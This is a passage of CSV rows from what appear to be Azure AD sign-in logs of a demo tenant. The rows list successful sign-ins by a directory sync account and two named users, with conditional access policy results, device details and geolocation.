Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3a4d127f-5a89-4252-9f54-d79dd3590600,SigninLogs,Sucess,36.6404686,-78.26995087
+1356,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:55.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,04c8c0c0-a7ad-4f36-94c8-72f119951645,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3c1797ce-9a4e-4e19-b7f0-81e09b5e0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3c1797ce-9a4e-4e19-b7f0-81e09b5e0600,SigninLogs,Sucess,36.6404686,-78.26995087
+1357,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:54,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",563eb34c-e3fc-4a4c-9f9d-11bdeaf92500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,563eb34c-e3fc-4a4c-9f9d-11bdeaf92500,SigninLogs,Sucess,32.0840416,34.88776016
+1358,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:55.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,90797766-589a-4635-bacf-a42e81550772,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3a4d127f-5a89-4252-9f54-d79dd3590600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3a4d127f-5a89-4252-9f54-d79dd3590600,SigninLogs,Sucess,36.6404686,-78.26995087
+1359,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:55.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,04c8c0c0-a7ad-4f36-94c8-72f119951645,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3c1797ce-9a4e-4e19-b7f0-81e09b5e0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3c1797ce-9a4e-4e19-b7f0-81e09b5e0600,SigninLogs,Sucess,36.6404686,-78.26995087
+1360,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:49.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e241d939-3a35-42e0-a944-18989ab24306,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Windows Sign In,38aa3b87-a06d-4817-b275-7a316988d93b,Mobile Apps and Desktop clients,[],notApplied,08/04/2020 07:28,"{'operatingSystem': 'Windows', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",0cfe4b5b-09c7-4394-bb27-21b9051f0600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0cfe4b5b-09c7-4394-bb27-21b9051f0600,SigninLogs,Sucess,50.6406517,5.572050095
+1361,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:54,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",563eb34c-e3fc-4a4c-9f9d-11bdeaf92500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,563eb34c-e3fc-4a4c-9f9d-11bdeaf92500,SigninLogs,Sucess,32.0840416,34.88776016
+1362,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:50.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,680d88ad-50cd-4ec4-9d9c-1431809b45cb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Windows Sign In,38aa3b87-a06d-4817-b275-7a316988d93b,Mobile Apps and Desktop clients,[],notApplied,08/04/2020 07:28,"{'operatingSystem': 'Windows', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3109113e-8f92-47c2-a124-24834cc80600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3109113e-8f92-47c2-a124-24834cc80600,SigninLogs,Sucess,50.6406517,5.572050095
+1363,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ff7c8eb-3282-4ba3-be1e-06a25b2f3524,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",429b44fe-fb38-41be-832c-f142938c0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,429b44fe-fb38-41be-832c-f142938c0500,SigninLogs,Sucess,36.6404686,-78.26995087
+1364,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ff7c8eb-3282-4ba3-be1e-06a25b2f3524,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",429b44fe-fb38-41be-832c-f142938c0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,429b44fe-fb38-41be-832c-f142938c0500,SigninLogs,Sucess,36.6404686,-78.26995087
